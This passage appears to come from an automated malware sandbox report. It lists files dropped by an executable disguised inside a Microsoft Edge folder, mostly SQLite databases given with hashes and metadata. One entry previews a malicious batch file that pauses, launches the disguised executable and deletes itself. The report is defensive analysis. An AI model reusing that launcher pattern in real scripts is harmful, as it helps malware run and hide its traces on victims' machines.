                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):98304
                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):236
                                                                                                                      Entropy (8bit):5.427981583263844
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:hCRLuVFOOr+DER5I3uTckBhp2egb4jJGkrYyKOZG1wkn23fvtztO:CuVEOCDEfTzuegM3ZfdztO
                                                                                                                      MD5:2BDBD831DB735879CACCEA8A2A174D2A
                                                                                                                      SHA1:0C5009BC8DF8A7041601AE80ECD80BD002EFF66F
                                                                                                                      SHA-256:83FF6510B9A0B5EB507F156CDECBFEA79844C8381501FED08C7CA675FD63CA78
                                                                                                                      SHA-512:82E2878308BD768A0CC11CC714C9FA9EB359F2FC5BBE7AF04B503A960F102674271F880153EAA4DE0C362FE478C37D708EC7B5211763C92816E9BE174895206D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KC0FFSqemJ.bat"
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):98304
                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
